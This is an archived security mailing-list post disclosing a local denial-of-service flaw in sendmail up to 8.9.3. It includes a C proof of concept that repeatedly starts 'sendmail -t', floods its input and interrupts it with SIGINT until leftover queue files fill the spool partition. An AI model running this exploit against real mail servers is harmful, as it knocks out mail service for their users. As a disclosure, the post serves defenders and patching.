Hi, It seems that sendmail ran with -t option does NOT block SIGINT ... In that moment while we are sending data to its stdin, when we will press CTRL-C process is being killed, but in queue rests unfinished letter. It stays there quite long - long enought to fullfill partition on disk where /var/spool/mqueue resides. When it happends, sendmail doesn't allow new connections - so it is a kind of DoS attack for this service. It has been tested on all new versions on sendmail up to current (8.9.3). Example ... --- CUT HERE ---- #include <stdio.h> #include <unistd.h> #include <signal.h> #include <sys/wait.h> #define DELAY 5 /* time in seconds needed to reach MaxMessageSize limit */ #define SM_PATH "/usr/sbin/sendmail -t" void main() { FILE *fd; int pid; for(;;) { if(( pid = fork()) == 0) { setpgrp(); if(( fd = popen( SM_PATH, "w")) == NULL) fprintf( stderr, "popen error\n"); for(;;) fputc( 'A', fd); } else { sleep( DELAY); kill( (-1) * pid, SIGINT); fprintf( stdout, "next\n"); wait( NULL); } } } --- CUT HERE --- Regards, --- Lukasz Luzar K.K.I. http://noname.kki.krakow.pl/ lluzarat_private
This archive was generated by hypermail 2b30 : Fri Apr 13 2001 - 14:41:18 PDT